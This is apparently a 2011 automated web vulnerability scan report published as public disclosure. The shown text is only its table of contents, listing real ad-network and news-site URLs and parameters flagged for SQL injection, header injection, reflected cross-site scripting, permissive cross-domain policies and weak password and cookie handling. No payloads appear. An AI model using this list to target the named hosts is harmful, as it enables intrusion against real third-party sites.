XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05092011-02

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 09 09:36:16 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. http://l.alvenda.net/e [e parameter]

1.2. http://l.alvenda.net/e [so parameter]

1.3. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx [REST URL parameter 2]

2. HTTP header injection

2.1. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3 [REST URL parameter 1]

2.2. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday [name of an arbitrarily supplied request parameter]

2.3. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday [secure parameter]

3. Cross-site scripting (reflected)

3.1. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 2]

3.2. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 3]

3.3. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [name of an arbitrarily supplied request parameter]

3.4. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [tgt parameter]

3.5. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [REST URL parameter 2]

3.6. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [REST URL parameter 3]

3.7. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [name of an arbitrarily supplied request parameter]

3.8. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [sz parameter]

3.9. http://a.collective-media.net/adj/q1.q.gc.6170/news [REST URL parameter 2]

3.10. http://a.collective-media.net/adj/q1.q.gc.6170/news [REST URL parameter 3]

3.11. http://a.collective-media.net/adj/q1.q.gc.6170/news [name of an arbitrarily supplied request parameter]

3.12. http://a.collective-media.net/adj/q1.q.gc.6170/news [sz parameter]

3.13. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 1]

3.14. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 2]

3.15. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 3]

3.16. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [sz parameter]

3.17. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 1]

3.18. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 2]

3.19. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 3]

3.20. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [sz parameter]

3.21. http://ad.doubleclick.net/adj/cm.tribune/uscell_ldev_300x600_05311 [net parameter]

3.22. http://ad.doubleclick.net/adj/trb.orlandosentinel/biz [;ptype parameter]

3.23. http://ad.turn.com/server/pixel.htm [fpid parameter]

3.24. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

3.25. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

3.26. http://admatch-syndication.mochila.com/viewer/channel/badgex [buyerId parameter]

3.27. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

3.28. http://admeld.adnxs.com/usersync [admeld_callback parameter]

3.29. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

3.30. http://ar.voicefive.com/b/rc.pli [func parameter]

3.31. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.32. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.33. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.34. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.35. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.36. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.37. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.38. http://bid.openx.net/json [c parameter]

3.39. http://choices.truste.com/ca [c parameter]

3.40. http://choices.truste.com/ca [cid parameter]

3.41. http://choices.truste.com/ca [iplc parameter]

3.42. http://choices.truste.com/ca [js parameter]

3.43. http://choices.truste.com/ca [name of an arbitrarily supplied request parameter]

3.44. http://choices.truste.com/ca [ox parameter]

3.45. http://choices.truste.com/ca [plc parameter]

3.46. http://choices.truste.com/ca [zi parameter]

3.47. http://content.pulse360.com/cgi-bin/context.cgi [id parameter]

3.48. http://ct.buzzfeed.com/wd/UserWidget [amp;or parameter]

3.49. http://ct.buzzfeed.com/wd/UserWidget [u parameter]

3.50. http://ds.addthis.com/red/psi/sites/www.irishtimes.com/p.json [callback parameter]

3.51. http://edge.viagogo.co.uk/feeds/widget.ashx [PCID parameter]

3.52. http://event.adxpose.com/event.flow [uid parameter]

3.53. http://floridatoday.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

3.54. http://ib.adnxs.com/ab [cnd parameter]

3.55. http://ib.adnxs.com/ab [custom_macro parameter]

3.56. http://ib.adnxs.com/ptj [redir parameter]

3.57. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

3.58. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

3.59. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

3.60. http://js.revsci.net/gateway/gw.js [csid parameter]

3.61. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 2]

3.62. http://mf.sitescout.com/tag.jsp [h parameter]

3.63. http://mf.sitescout.com/tag.jsp [pid parameter]

3.64. http://mf.sitescout.com/tag.jsp [w parameter]

3.65. http://odb.outbrain.com/utils/odb [callback parameter]

3.66. http://pglb.buzzfed.com/124044/2cda0cc53888bd4bde08b06faa4b2d81 [callback parameter]

3.67. http://r.turn.com/server/pixel.htm [fpid parameter]

3.68. http://r.turn.com/server/pixel.htm [sp parameter]

3.69. http://sitelife.floridatoday.com/ver1.0/daapi2.api [jpcb parameter]

3.70. http://sitelife.floridatoday.com/ver1.0/daapi2.api [jpctx parameter]

3.71. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif [REST URL parameter 1]

3.72. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

3.73. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

3.74. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

3.75. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

3.76. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

3.77. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

3.78. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

3.79. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

3.80. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/page_parser.js [d parameter]

3.81. http://wd.sharethis.com/api/getCount2.php [cb parameter]

3.82. http://wd.sharethis.com/api/getCount2.php [name of an arbitrarily supplied request parameter]

3.83. http://wd.sharethis.com/api/getCount2.php [url parameter]

3.84. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [evt parameter]

3.85. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [evt parameter]

3.86. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [siteid parameter]

3.87. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [siteid parameter]

3.88. https://www.ccnow.com/cgi-local/checkout.cgi [shipto parameter]

3.89. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 1]

3.90. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]

3.91. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]

3.92. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]

3.93. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [name of an arbitrarily supplied request parameter]

3.94. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [name of an arbitrarily supplied request parameter]

3.95. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 1]

3.96. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 2]

3.97. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 3]

3.98. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 4]

3.99. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 5]

3.100. http://www.clashmusic.com/user/a [REST URL parameter 1]

3.101. http://www.clashmusic.com/user/a [REST URL parameter 2]

3.102. http://www.clashmusic.com/user/a [REST URL parameter 2]

3.103. http://www.clashmusic.com/user/a [name of an arbitrarily supplied request parameter]

3.104. http://www.clashmusic.com/user/password [REST URL parameter 1]

3.105. http://www.clashmusic.com/user/password [REST URL parameter 2]

3.106. http://www.clashmusic.com/user/password [REST URL parameter 2]

3.107. http://www.clashmusic.com/user/password [name of an arbitrarily supplied request parameter]

3.108. http://www.clashmusic.com/user/register [REST URL parameter 1]

3.109. http://www.clashmusic.com/user/register [REST URL parameter 2]

3.110. http://www.clashmusic.com/user/register [REST URL parameter 2]

3.111. http://www.clashmusic.com/user/register [name of an arbitrarily supplied request parameter]

3.112. http://www.irishtimes.com/newspaper/mostread/pagelog.cfm [REST URL parameter 3]

3.113. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 2]

3.114. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 4]

3.115. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 5]

3.116. http://www.nme.com/adcode/hot-spot.html [REST URL parameter 1]

3.117. http://www.nme.com/favicon.ico [REST URL parameter 1]

3.118. http://www.nme.com/hotspot/channel/news [REST URL parameter 1]

3.119. http://www.nme.com/news/sufjan-stevens/56527 [REST URL parameter 1]

3.120. http://ib.adnxs.com/ttj [Referer HTTP header]

3.121. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [cli cookie]

3.122. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [cli cookie]

3.123. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [cli cookie]

3.124. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

3.125. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

3.126. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

3.127. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

3.128. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

3.129. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

3.130. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

3.131. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

3.132. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

3.133. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

3.134. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

3.135. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [cli cookie]

3.136. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [cli cookie]

3.137. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js [ruid cookie]

3.138. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js [ruid cookie]

3.139. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js [ruid cookie]

3.140. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js [ruid cookie]

3.141. http://optimized-by.rubiconproject.com/a/7858/13549/26630-15.js [ruid cookie]

3.142. http://optimized-by.rubiconproject.com/a/7858/13549/26630-2.js [ruid cookie]

3.143. http://optimized-by.rubiconproject.com/a/7858/13549/26633-9.js [ruid cookie]

3.144. http://optimized-by.rubiconproject.com/a/8201/13264/25249-15.js [ruid cookie]

3.145. http://seg.sharethis.com/getSegment.php [__stid cookie]

3.146. http://tag.contextweb.com/TagPublish/getad.aspx [V cookie]

3.147. http://tag.contextweb.com/TagPublish/getad.aspx [cwbh1 cookie]

4. Flash cross-domain policy

4.1. http://ad-apac.doubleclick.net/crossdomain.xml

4.2. http://ad.au.doubleclick.net/crossdomain.xml

4.3. http://adserver.adtech.de/crossdomain.xml

4.4. http://adserverams.adtech.de/crossdomain.xml

4.5. http://alvenda.122.2o7.net/crossdomain.xml

4.6. http://api.brightcove.com/crossdomain.xml

4.7. http://cspix.media6degrees.com/crossdomain.xml

4.8. http://f2nthevine.112.2o7.net/crossdomain.xml

4.9. http://ie-stat.bmmetrix.com/crossdomain.xml

4.10. http://imp.fetchback.com/crossdomain.xml

4.11. http://in.getclicky.com/crossdomain.xml

4.12. http://ipcmedia.122.2o7.net/crossdomain.xml

4.13. http://irishtimesgroup.112.2o7.net/crossdomain.xml

4.14. http://p.addthis.com/crossdomain.xml

4.15. http://pixel.33across.com/crossdomain.xml

4.16. http://s0.2mdn.net/crossdomain.xml

4.17. http://secure-au.imrworldwide.com/crossdomain.xml

4.18. http://va.px.invitemedia.com/crossdomain.xml

4.19. http://edge.viagogo.co.uk/crossdomain.xml

4.20. http://l.alvenda.net/crossdomain.xml

4.21. http://optimized-by.rubiconproject.com/crossdomain.xml

4.22. http://static.nme.com/crossdomain.xml

4.23. http://west.thomson.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad-apac.doubleclick.net/clientaccesspolicy.xml

5.2. http://ad.au.doubleclick.net/clientaccesspolicy.xml

5.3. http://alvenda.122.2o7.net/clientaccesspolicy.xml

5.4. http://f2nthevine.112.2o7.net/clientaccesspolicy.xml

5.5. http://ipcmedia.122.2o7.net/clientaccesspolicy.xml

5.6. http://irishtimesgroup.112.2o7.net/clientaccesspolicy.xml

5.7. http://pixel.33across.com/clientaccesspolicy.xml

5.8. http://s0.2mdn.net/clientaccesspolicy.xml

5.9. http://secure-au.imrworldwide.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

6.2. http://www.clashmusic.com/user/a

6.3. http://www.floridatoday.com/odygel/lib/userauth/content/login.html

6.4. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html

6.5. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

7. Session token in URL

7.1. http://api.brightcove.com/services/library

7.2. http://l.sharethis.com/pview

7.3. http://www.apture.com/js/apture.js

7.4. http://www.facebook.com/extern/login_status.php

7.5. http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html

7.6. http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story

7.7. http://www.orlandosentinel.com/business/transparent

8. Password field submitted using GET method

8.1. http://www.floridatoday.com/odygel/lib/userauth/content/login.html

8.2. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html

9. Cookie scoped to parent domain

9.1. http://api.twitter.com/1/statuses/user_timeline.json

9.2. http://t.mookie1.com/t/v1/imp

9.3. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

9.4. http://www.nme.com/news/sufjan-stevens/56527

9.5. http://ad.afy11.net/ad

9.6. http://ad.turn.com/server/pixel.htm

9.7. http://admeld.adnxs.com/usersync

9.8. http://ads.adbrite.com/adserver/vdi/742697

9.9. http://ads.pointroll.com/PortalServe/

9.10. http://ads.revsci.net/adserver/ako

9.11. http://ads.revsci.net/adserver/ako

9.12. http://ads.revsci.net/adserver/ako

9.13. http://ads.revsci.net/adserver/ako

9.14. http://ads.revsci.net/adserver/ako

9.15. http://adserver.adtech.de/addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH

9.16. http://adserver.adtech.de/bind

9.17. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

9.18. http://ar.voicefive.com/b/wc_beacon.pli

9.19. http://ar.voicefive.com/bmx3/broker.pli

9.20. http://b.scorecardresearch.com/b

9.21. http://b.scorecardresearch.com/r

9.22. http://b.voicefive.com/b

9.23. http://bh.contextweb.com/bh/rtset

9.24. http://bid.openx.net/json

9.25. http://bs.serving-sys.com/BurstingPipe/adServer.bs

9.26. http://cf.addthis.com/red/p.json

9.27. http://content.pulse360.com/cgi-bin/context.cgi

9.28. http://core.insightexpressai.com/adServer/adServerESI.aspx

9.29. http://cspix.media6degrees.com/orbserv/hbpix

9.30. http://cw-m.d.chango.com/m/cw

9.31. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2931142961646634775

9.32. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2931142961646634775

9.33. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2931142961646634775

9.34. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2931142961646634775

9.35. http://data.adsrvr.org/map/cookie/contextweb

9.36. http://ds.addthis.com/red/psi/sites/www.irishtimes.com/p.json

9.37. http://edge.quantserve.com/quant.js

9.38. http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

9.39. http://floridatoday.us.intellitxt.com/intellitxt/front.asp

9.40. http://gpaper114.112.2o7.net/b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519

9.41. http://i.w55c.net/ping_match.gif

9.42. http://ib.adnxs.com/ab

9.43. http://ib.adnxs.com/getuid

9.44. http://ib.adnxs.com/if

9.45. http://ib.adnxs.com/mapuid

9.46. http://ib.adnxs.com/ptj

9.47. http://ib.adnxs.com/seg

9.48. http://ib.adnxs.com/ttj

9.49. http://idpix.media6degrees.com/orbserv/hbpix

9.50. http://image2.pubmatic.com/AdServer/Pug

9.51. http://imp.fetchback.com/serve/fb/adtag.js

9.52. http://imp.fetchback.com/serve/fb/imp

9.53. http://ipcmedia.grapeshot.co.uk/channels.cgi

9.54. http://js.revsci.net/gateway/gw.js

9.55. http://leadback.advertising.com/adcedge/lb

9.56. http://newspaper.app40.ur.gcion.com/GCION.ashx

9.57. http://odb.outbrain.com/utils/odb

9.58. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js

9.59. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js

9.60. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js

9.61. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js

9.62. http://optimized-by.rubiconproject.com/a/7858/13549/26630-15.js

9.63. http://optimized-by.rubiconproject.com/a/7858/13549/26630-2.js

9.64. http://optimized-by.rubiconproject.com/a/7858/13549/26633-9.js

9.65. http://optimized-by.rubiconproject.com/a/8201/13264/25249-15.js

9.66. http://p.brilig.com/contact/bct

9.67. http://pix04.revsci.net/B08725/b3/0/3/1008211/17329585.js

9.68. http://pix04.revsci.net/D08734/a1/0/0/0.gif

9.69. http://pix04.revsci.net/I10982/b3/0/3/1003161/448768738.js

9.70. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

9.71. http://pix04.revsci.net/J06575/b3/0/3/1003161/306691632.gif

9.72. http://pixel.33across.com/ps/

9.73. http://pixel.invitemedia.com/data_sync

9.74. http://pixel.quantserve.com/pixel

9.75. http://pixel.rubiconproject.com/tap.php

9.76. http://r.openx.net/set

9.77. http://r.turn.com/r/bd

9.78. http://r.turn.com/server/pixel.htm

9.79. http://r1-ads.ace.advertising.com/site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

9.80. http://rt.legolas-media.com/lgrt

9.81. http://services.krxd.net/pixel.gif

9.82. http://sitelife.floridatoday.com/ver1.0/daapi2.api

9.83. http://sync.mathtag.com/sync/img

9.84. http://syndication.mmismm.com/tntwo.php

9.85. http://t.invitemedia.com/track_imp

9.86. http://tacoda.at.atwola.com/rtx/r.js

9.87. http://tag.contextweb.com/TagPublish/getad.aspx

9.88. http://tags.bluekai.com/site/2731

9.89. http://tags.bluekai.com/site/3358

9.90. http://tap.rubiconproject.com/oz/sensor

9.91. http://trgca.opt.fimserve.com/fp.gif

9.92. http://va.px.invitemedia.com/pixel

9.93. http://www.burstnet.com/enlightn/7578//12A4/

10. Cookie without HttpOnly flag set

10.1. http://admatch-syndication.mochila.com/viewer/channel/badgeCSS

10.2. http://admatch-syndication.mochila.com/viewer/channel/badgex

10.3. http://ads.adxpose.com/ads/ads.js

10.4. http://event.adxpose.com/event.flow

10.5. http://s.clickability.com/s

10.6. http://t.mookie1.com/t/v1/imp

10.7. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

10.8. http://www.nme.com/news/sufjan-stevens/56527

10.9. http://ad.afy11.net/ad

10.10. http://ad.turn.com/server/pixel.htm

10.11. http://ad.yieldmanager.com/iframe3

10.12. http://ad.yieldmanager.com/imp

10.13. http://ad.yieldmanager.com/pixel

10.14. http://ad.yieldmanager.com/unpixel

10.15. http://ads.adbrite.com/adserver/vdi/742697

10.16. http://ads.pointroll.com/PortalServe/

10.17. http://ads.revsci.net/adserver/ako

10.18. http://ads.revsci.net/adserver/ako

10.19. http://ads.revsci.net/adserver/ako

10.20. http://ads.revsci.net/adserver/ako

10.21. http://ads.revsci.net/adserver/ako

10.22. http://adserver.adtech.de/addyn%7C3.0%7C577%7C2951880%7C0%7C170%7CADTECH

10.23. http://adserver.adtech.de/addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH

10.24. http://adserver.adtech.de/bind

10.25. http://adserver.clashmusic.com/www/delivery/lg.php

10.26. http://adserver.clashmusic.com/www/delivery/spc.php

10.27. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

10.28. http://api.twitter.com/1/statuses/user_timeline.json

10.29. http://api.twitter.com/1/statuses/user_timeline.json

10.30. http://ar.atwola.com/atd

10.31. http://ar.voicefive.com/b/wc_beacon.pli

10.32. http://ar.voicefive.com/bmx3/broker.pli

10.33. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003016/pixel.gif

10.34. http://b.scorecardresearch.com/b

10.35. http://b.scorecardresearch.com/r

10.36. http://b.voicefive.com/b

10.37. http://bandcamp.com/EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB//

10.38. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/

10.39. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/

10.40. http://bh.contextweb.com/bh/rtset

10.41. http://bid.openx.net/json

10.42. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.43. http://cf.addthis.com/red/p.json

10.44. http://content.pulse360.com/cgi-bin/context.cgi

10.45. http://contextweb-match.dotomi.com/

10.46. http://core.insightexpressai.com/adServer/adServerESI.aspx

10.47. http://cspix.media6degrees.com/orbserv/hbpix

10.48. http://cw-m.d.chango.com/m/cw

10.49. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2931142961646634775

10.50. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2931142961646634775

10.51. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2931142961646634775

10.52. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2931142961646634775

10.53. http://d.tradex.openx.com/ajs.php

10.54. http://d.tradex.openx.com/lg.php

10.55. http://data.adsrvr.org/map/cookie/contextweb

10.56. http://data.cmcore.com/imp

10.57. http://ds.addthis.com/red/psi/sites/www.irishtimes.com/p.json

10.58. http://edge.quantserve.com/quant.js

10.59. http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

10.60. http://floridatoday.us.intellitxt.com/intellitxt/front.asp

10.61. http://gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH

10.62. http://gannett.gcion.com/addyn/3.0/5111.1/896067/0/-1/ADTECH

10.63. http://gpaper114.112.2o7.net/b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519

10.64. http://i.w55c.net/ping_match.gif

10.65. http://idpix.media6degrees.com/orbserv/hbpix

10.66. http://ie-stat.bmmetrix.com/V13a

10.67. http://ie-stat.bmmetrix.com/V13b

10.68. http://image2.pubmatic.com/AdServer/Pug

10.69. http://imp.fetchback.com/serve/fb/adtag.js

10.70. http://imp.fetchback.com/serve/fb/imp

10.71. http://ipcmedia.122.2o7.net/b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795

10.72. http://ipcmedia.grapeshot.co.uk/channels.cgi

10.73. http://irishtimesgroup.112.2o7.net/b/ss/itgirishtimesprod/1/H.15.1/s81982920831069

10.74. http://js.revsci.net/gateway/gw.js

10.75. http://latent.alvenda.net/Latent.html

10.76. http://leadback.advertising.com/adcedge/lb

10.77. http://media.adfrontiers.com/pq

10.78. http://newspaper.app40.ur.gcion.com/GCION.ashx

10.79. http://oads.mochila.com/openx/www/delivery/ajs.php

10.80. http://oads.mochila.com/www/delivery/lg.php

10.81. http://odb.outbrain.com/utils/odb

10.82. http://openx2-match.dotomi.com/

10.83. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js

10.84. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js

10.85. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js

10.86. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js

10.87. http://optimized-by.rubiconproject.com/a/7858/13549/26630-15.js

10.88. http://optimized-by.rubiconproject.com/a/7858/13549/26630-2.js

10.89. http://optimized-by.rubiconproject.com/a/7858/13549/26633-9.js

10.90. http://optimized-by.rubiconproject.com/a/8201/13264/25249-15.js

10.91. http://p.brilig.com/contact/bct

10.92. http://pix04.revsci.net/B08725/b3/0/3/1008211/17329585.js

10.93. http://pix04.revsci.net/D08734/a1/0/0/0.gif

10.94. http://pix04.revsci.net/I10982/b3/0/3/1003161/448768738.js

10.95. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

10.96. http://pix04.revsci.net/J06575/b3/0/3/1003161/306691632.gif

10.97. http://pixel.33across.com/ps/

10.98. http://pixel.invitemedia.com/data_sync

10.99. http://pixel.quantserve.com/pixel

10.100. http://pixel.rubiconproject.com/tap.php

10.101. http://r.openx.net/set

10.102. http://r.turn.com/r/bd

10.103. http://r.turn.com/server/pixel.htm

10.104. http://r1-ads.ace.advertising.com/site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

10.105. http://rt.legolas-media.com/lgrt

10.106. http://services.krxd.net/pixel.gif

10.107. http://sitelife.floridatoday.com/ver1.0/Content/images/store/12/1/6c2f9a14-d970-4d97-b1b8-998eda420787.Large.jpg

10.108. http://sitelife.floridatoday.com/ver1.0/Content/images/store/13/14/3d0cb25d-d19d-4993-ae7a-7bb7b30af008.Large.jpg

10.109. http://sitelife.floridatoday.com/ver1.0/Direct/DirectProxy

10.110. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/json-min.js

10.111. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/pork.iframe.js

10.112. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/requestbatch.js

10.113. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/requesttypes.js

10.114. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/yahoo-min.js

10.115. http://sitelife.floridatoday.com/ver1.0/daapi2.api

10.116. http://sitelife.floridatoday.com/ver1.0/direct/javascriptsdkproxy

10.117. http://sync.mathtag.com/sync/img

10.118. http://syndication.mmismm.com/tntwo.php

10.119. http://t.invitemedia.com/track_imp

10.120. http://tacoda.at.atwola.com/rtx/r.js

10.121. http://tag.contextweb.com/TagPublish/getad.aspx

10.122. http://tags.bluekai.com/site/2731

10.123. http://tags.bluekai.com/site/3358

10.124. http://tap.rubiconproject.com/oz/sensor

10.125. http://trgca.opt.fimserve.com/fp.gif

10.126. http://va.px.invitemedia.com/pixel

10.127. http://west.thomson.com/VendorFeeds/Alvendify/AlvendaImpression.aspx

10.128. http://www.burstbeacon.com/view/103170/64948/182030/318088/3050/2D1A28EF/

10.129. http://www.burstnet.com/cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

10.130. http://www.burstnet.com/enlightn/7578//12A4/

10.131. http://www.ccnow.com/cgi-local/cart.cgi

10.132. http://www.ccnow.com/cgi-local/sc_cart.cgi

10.133. https://www.ccnow.com/cgi-local/cart.cgi

10.134. https://www.ccnow.com/cgi-local/checkout.cgi

10.135. https://www.ccnow.com/cgi-local/sc_cart.cgi

11. Password field with autocomplete enabled

11.1. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

11.2. http://www.clashmusic.com/user/a

11.3. http://www.floridatoday.com/odygel/lib/userauth/content/login.html

11.4. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html

11.5. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

12. Referer-dependent response

